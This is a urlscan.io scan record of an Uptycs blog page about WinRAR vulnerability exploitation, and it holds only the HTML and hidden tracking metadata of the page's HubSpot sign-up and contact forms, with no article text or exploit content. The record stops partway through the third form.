www.uptycs.com Open in urlscan Pro
199.60.103.30  Public Scan

URL: https://www.uptycs.com/blog/winrar-vulnerability-exploitation
Submission: On April 16 via api from BY — Scanned from DE

Form analysis 3 forms found in the DOM

POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e

<form id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
  action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e"
  class="hs-form-private hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e_6a163c41-1de7-4bcd-9125-7dbb5e2777e0 hs-form stacked hs-custom-form"
  target="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-instance-id="6a163c41-1de7-4bcd-9125-7dbb5e2777e0" data-form-id="a84fa16e-d67b-4c28-b1c2-bce43902236e" data-portal-id="2617658"
  data-test-id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-hs-cf-bound="true">
  <fieldset class="form-columns-0">
    <div class="hs-richtext hs-main-font-element">
      <h1 style="font-size: 20px;">Sign up here:</h1>
    </div>
  </fieldset>
  <fieldset class="form-columns-2">
    <div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your First name"
        for="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>First name</span><span class="hs-form-required">*</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input id="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
    </div>
    <div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Last name"
        for="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Last name</span><span class="hs-form-required">*</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input id="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Work Email" for="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Work
          Email</span><span class="hs-form-required">*</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input id="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-2">
    <div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Phone number"
        for="phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Phone number</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
    </div>
    <div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Company name"
        for="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company name</span><span class="hs-form-required">*</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input id="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs-dependent-field">
      <div class="hs_my_security_priority_is_ hs-my_security_priority_is_ hs-fieldtype-select field hs-form-field" style="display: none;"><label id="label-my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
          placeholder="Enter your My security priority is:" for="my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>My security priority is:</span></label>
        <legend class="hs-field-desc" style="display: none;"></legend>
        <div class="input"><input name="my_security_priority_is_" class="hs-input" type="hidden" value=""></div>
      </div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
        placeholder="Enter your How did you hear about us?" for="how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>How did you hear about us?</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
        placeholder="Enter your Company HQ - State" for="company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company HQ - State</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Job title"
        for="jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Job title</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Employees"
        for="numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Employees</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
        placeholder="Enter your Became an MQL date" for="became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Became an MQL date</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs-dependent-field">
      <div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your What color is the sky?"
          for="honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>What color is the sky?</span></label>
        <legend class="hs-field-desc" style="display: none;"></legend>
        <div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
      </div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your LD BookIt Log ID"
        for="ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>LD BookIt Log ID</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_source"
        for="utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_source</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_medium"
        for="utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_medium</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_content"
        for="utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_content</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_campaign"
        for="utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_campaign</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
    </div>
  </fieldset>
  <fieldset class="form-columns-1">
    <div class="legal-consent-container">
      <div class="hs-richtext">
        <p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
      </div>
    </div>
  </fieldset>
  <div class="hs_submit hs-submit">
    <div class="hs-field-desc" style="display: none;"></div>
    <div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
  </div><input name="hs_context" type="hidden"
    value="{&quot;embedAtTimestamp&quot;:&quot;1713298179640&quot;,&quot;formDefinitionUpdatedAt&quot;:&quot;1699473876130&quot;,&quot;lang&quot;:&quot;en&quot;,&quot;legalConsentOptions&quot;:&quot;{\&quot;legitimateInterestSubscriptionTypes\&quot;:[3136631],\&quot;communicationConsentCheckboxes\&quot;:[{\&quot;communicationTypeId\&quot;:3136631,\&quot;label\&quot;:\&quot;I agree to receive other communications from Uptycs.\&quot;,\&quot;required\&quot;:false}],\&quot;legitimateInterestLegalBasis\&quot;:\&quot;LEGITIMATE_INTEREST_PQL\&quot;,\&quot;communicationConsentText\&quot;:\&quot;Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\&quot;,\&quot;processingConsentType\&quot;:\&quot;IMPLICIT\&quot;,\&quot;processingConsentText\&quot;:\&quot;In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\&quot;,\&quot;processingConsentCheckboxLabel\&quot;:\&quot;I agree to allow Uptycs to store and process my personal data.\&quot;,\&quot;privacyPolicyText\&quot;:\&quot;<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\&quot;https://www.uptycs.com/privacy\\\&quot; target=\\\&quot;_blank\\\&quot;>Privacy Policy</a></u>.</p>\&quot;,\&quot;isLegitimateInterest\&quot;:true}&quot;,&quot;embedType&quot;:&quot;REGULAR&quot;,&quot;clonedFromForm&quot;:&quot;d6de4afc-a64a-42eb-aa20-ab41fc2fe11c&quot;,&quot;notifyHubSpotOwner&quot;:&quot;true&quot;,&quot;userAgent&quot;:&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36&quot;,&quot;pageTitle&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;isHubSpotCmsGeneratedPage&quot;:true,&quot;canonicalUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;hutk&quot;:&quot;bebd24343e2ed718561e5a8f320fe293&quot;,&quot;__hsfp&quot;:726726051,&quot;__hssc&quot;:&quot;26386402.1.1713298181281&quot;,&quot;__hstc&quot;:&quot;26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1&quot;,&quot;formTarget&quot;:&quot;#hs_form_target_form_772372348&quot;,&quot;formInstanceId&quot;:&quot;8032&quot;,&quot;rawInlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;hsFormKey&quot;:&quot;339e825031d31583ab18f0bd876560f4&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;dateFields&quot;:&quot;became_an_mql_date&quot;,&quot;rumScriptExecuteTime&quot;:1339.6999969482422,&quot;rumTotalRequestTime&quot;:2025.3000030517578,&quot;rumTotalRenderTime&quot;:2163.300003051758,&quot;rumServiceResponseTime&quot;:685.6000061035156,&quot;rumFormRenderTime&quot;:138,&quot;connectionType&quot;:&quot;4g&quot;,&quot;firstContentfulPaint&quot;:0,&quot;largestContentfulPaint&quot;:0,&quot;locale&quot;:&quot;en&quot;,&quot;timestamp&quot;:1713298181308,&quot;originalEmbedContext&quot;:{&quot;portalId&quot;:&quot;2617658&quot;,&quot;formId&quot;:&quot;a84fa16e-d67b-4c28-b1c2-bce43902236e&quot;,&quot;region&quot;:&quot;na1&quot;,&quot;target&quot;:&quot;#hs_form_target_form_772372348&quot;,&quot;isBuilder&quot;:false,&quot;isTestPage&quot;:false,&quot;isPreview&quot;:false,&quot;formInstanceId&quot;:&quot;8032&quot;,&quot;formsBaseUrl&quot;:&quot;/_hcms/forms&quot;,&quot;css&quot;:&quot;&quot;,&quot;inlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;isMobileResponsive&quot;:true,&quot;rawInlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;hsFormKey&quot;:&quot;339e825031d31583ab18f0bd876560f4&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;formData&quot;:{&quot;cssClass&quot;:&quot;hs-form stacked hs-custom-form&quot;},&quot;isCMSModuleEmbed&quot;:true},&quot;correlationId&quot;:&quot;6a163c41-1de7-4bcd-9125-7dbb5e2777e0&quot;,&quot;renderedFieldsIds&quot;:[&quot;firstname&quot;,&quot;lastname&quot;,&quot;email&quot;,&quot;phone&quot;,&quot;company&quot;,&quot;my_security_priority_is_&quot;,&quot;how_did_you_hear_about_uptycs_&quot;,&quot;company_hq___state&quot;,&quot;jobtitle&quot;,&quot;numberofemployees&quot;,&quot;became_an_mql_date&quot;,&quot;honeypot_queue&quot;,&quot;ld_bookit_log_id&quot;,&quot;utm_source&quot;,&quot;utm_medium&quot;,&quot;utm_content&quot;,&quot;utm_campaign&quot;],&quot;captchaStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;emailResubscribeStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;isInsideCrossOriginFrame&quot;:false,&quot;source&quot;:&quot;forms-embed-1.5064&quot;,&quot;sourceName&quot;:&quot;forms-embed&quot;,&quot;sourceVersion&quot;:&quot;1.5064&quot;,&quot;sourceVersionMajor&quot;:&quot;1&quot;,&quot;sourceVersionMinor&quot;:&quot;5064&quot;,&quot;allPageIds&quot;:{&quot;embedContextPageId&quot;:&quot;133806526071&quot;,&quot;analyticsPageId&quot;:&quot;133806526071&quot;,&quot;contentPageId&quot;:133806526071,&quot;contentAnalyticsPageId&quot;:&quot;133806526071&quot;},&quot;_debug_embedLogLines&quot;:[{&quot;clientTimestamp&quot;:1713298180175,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved customer callbacks used on embed context: [\&quot;getExtraMetaDataBeforeSubmit\&quot;]&quot;},{&quot;clientTimestamp&quot;:1713298180175,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved pageContext values which may be overriden by the embed context: {\&quot;pageTitle\&quot;:\&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection\&quot;,\&quot;pageUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;userAgent\&quot;:\&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentAnalyticsPageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentPageId\&quot;:133806526071,\&quot;isHubSpotCmsGeneratedPage\&quot;:true}&quot;},{&quot;clientTimestamp&quot;:1713298180176,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved countryCode property from normalized embed definition response: \&quot;DE\&quot;&quot;},{&quot;clientTimestamp&quot;:1713298181302,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved analytics values from API response which may be overriden by the embed context: {\&quot;hutk\&quot;:\&quot;bebd24343e2ed718561e5a8f320fe293\&quot;,\&quot;canonicalUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;contentType\&quot;:\&quot;blog-post\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;}&quot;}]}"><iframe
    name="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" style="display: none;"></iframe>
</form>

POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802

<form id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
  action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802"
  class="hs-form-private hsForm_0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802_1297ca44-21d4-42ea-8deb-d6564e7b5c32 hs-form stacked hs-custom-form"
  target="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" data-instance-id="1297ca44-21d4-42ea-8deb-d6564e7b5c32" data-form-id="0492e7b1-c029-4110-8042-598f482d9802" data-portal-id="2617658"
  data-test-id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" data-hs-cf-bound="true">
  <div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your Work Email" for="email-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>Work
        Email</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="email-0492e7b1-c029-4110-8042-598f482d9802_1944" name="email" required="" placeholder="email@work.com" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
  </div>
  <div class="hs-dependent-field">
    <div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your What color is the sky?"
        for="honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>What color is the sky?</span></label>
      <legend class="hs-field-desc" style="display: none;"></legend>
      <div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
    </div>
  </div>
  <div class="hs_submit hs-submit">
    <div class="hs-field-desc" style="display: none;"></div>
    <div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
  </div><input name="hs_context" type="hidden"
    value="{&quot;embedAtTimestamp&quot;:&quot;1713298179620&quot;,&quot;formDefinitionUpdatedAt&quot;:&quot;1689357225520&quot;,&quot;lang&quot;:&quot;en&quot;,&quot;userAgent&quot;:&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36&quot;,&quot;pageTitle&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;isHubSpotCmsGeneratedPage&quot;:true,&quot;canonicalUrl&quot;:&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;hutk&quot;:&quot;bebd24343e2ed718561e5a8f320fe293&quot;,&quot;__hsfp&quot;:726726051,&quot;__hssc&quot;:&quot;26386402.1.1713298181281&quot;,&quot;__hstc&quot;:&quot;26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1&quot;,&quot;formTarget&quot;:&quot;#hs_form_target_form_984600344&quot;,&quot;formInstanceId&quot;:&quot;1944&quot;,&quot;rawInlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;hsFormKey&quot;:&quot;5e4fd5673911973f50e990e405439841&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;rumScriptExecuteTime&quot;:1339.6999969482422,&quot;rumTotalRequestTime&quot;:1991.3000030517578,&quot;rumTotalRenderTime&quot;:2017.099998474121,&quot;rumServiceResponseTime&quot;:651.6000061035156,&quot;rumFormRenderTime&quot;:25.79999542236328,&quot;connectionType&quot;:&quot;4g&quot;,&quot;firstContentfulPaint&quot;:0,&quot;largestContentfulPaint&quot;:0,&quot;locale&quot;:&quot;en&quot;,&quot;timestamp&quot;:1713298181301,&quot;originalEmbedContext&quot;:{&quot;portalId&quot;:&quot;2617658&quot;,&quot;formId&quot;:&quot;0492e7b1-c029-4110-8042-598f482d9802&quot;,&quot;region&quot;:&quot;na1&quot;,&quot;target&quot;:&quot;#hs_form_target_form_984600344&quot;,&quot;isBuilder&quot;:false,&quot;isTestPage&quot;:false,&quot;isPreview&quot;:false,&quot;formInstanceId&quot;:&quot;1944&quot;,&quot;formsBaseUrl&quot;:&quot;/_hcms/forms&quot;,&quot;css&quot;:&quot;&quot;,&quot;inlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;isMobileResponsive&quot;:true,&quot;rawInlineMessage&quot;:&quot;Thanks for submitting the form.&quot;,&quot;hsFormKey&quot;:&quot;5e4fd5673911973f50e990e405439841&quot;,&quot;pageName&quot;:&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection&quot;,&quot;pageId&quot;:&quot;133806526071&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;formData&quot;:{&quot;cssClass&quot;:&quot;hs-form stacked hs-custom-form&quot;},&quot;isCMSModuleEmbed&quot;:true},&quot;correlationId&quot;:&quot;1297ca44-21d4-42ea-8deb-d6564e7b5c32&quot;,&quot;renderedFieldsIds&quot;:[&quot;email&quot;,&quot;honeypot_queue&quot;],&quot;captchaStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;emailResubscribeStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;isInsideCrossOriginFrame&quot;:false,&quot;source&quot;:&quot;forms-embed-1.5064&quot;,&quot;sourceName&quot;:&quot;forms-embed&quot;,&quot;sourceVersion&quot;:&quot;1.5064&quot;,&quot;sourceVersionMajor&quot;:&quot;1&quot;,&quot;sourceVersionMinor&quot;:&quot;5064&quot;,&quot;allPageIds&quot;:{&quot;embedContextPageId&quot;:&quot;133806526071&quot;,&quot;analyticsPageId&quot;:&quot;133806526071&quot;,&quot;contentPageId&quot;:133806526071,&quot;contentAnalyticsPageId&quot;:&quot;133806526071&quot;},&quot;_debug_embedLogLines&quot;:[{&quot;clientTimestamp&quot;:1713298180141,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved customer callbacks used on embed context: [\&quot;getExtraMetaDataBeforeSubmit\&quot;]&quot;},{&quot;clientTimestamp&quot;:1713298180141,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved pageContext values which may be overriden by the embed context: {\&quot;pageTitle\&quot;:\&quot;WinRAR Vulnerability Exploitation: Decode &amp; Bolster Protection\&quot;,\&quot;pageUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;userAgent\&quot;:\&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentAnalyticsPageId\&quot;:\&quot;133806526071\&quot;,\&quot;contentPageId\&quot;:133806526071,\&quot;isHubSpotCmsGeneratedPage\&quot;:true}&quot;},{&quot;clientTimestamp&quot;:1713298180142,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved countryCode property from normalized embed definition response: \&quot;DE\&quot;&quot;},{&quot;clientTimestamp&quot;:1713298181297,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved analytics values from API response which may be overriden by the embed context: {\&quot;hutk\&quot;:\&quot;bebd24343e2ed718561e5a8f320fe293\&quot;,\&quot;canonicalUrl\&quot;:\&quot;https://www.uptycs.com/blog/winrar-vulnerability-exploitation\&quot;,\&quot;contentType\&quot;:\&quot;blog-post\&quot;,\&quot;pageId\&quot;:\&quot;133806526071\&quot;}&quot;}]}"><iframe
    name="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" style="display: none;"></iframe>
</form>

POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f

<form id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
  action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f"
  class="hs-form-private hsForm_464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f_3b848806-0722-4949-a72e-4881906c88f1 hs-form stacked hs-custom-form"
  target="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-instance-id="3b848806-0722-4949-a72e-4881906c88f1" data-form-id="464171ef-7766-4b86-9e48-f51bb13b325f" data-portal-id="2617658"
  data-test-id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-hs-cf-bound="true">
  <div>
    <div class="hs-richtext hs-main-font-element">
      <h2 style="font-size: 20px; text-align: center; padding-bottom: 9px;">Connect with a security expert</h2>
    </div>
  </div>
  <div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your First name"
      for="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>First name</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
  </div>
  <div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Last name"
      for="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Last name</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
  </div>
  <div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Work Email" for="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Work
        Email</span><span class="hs-form-required">*</span></label>
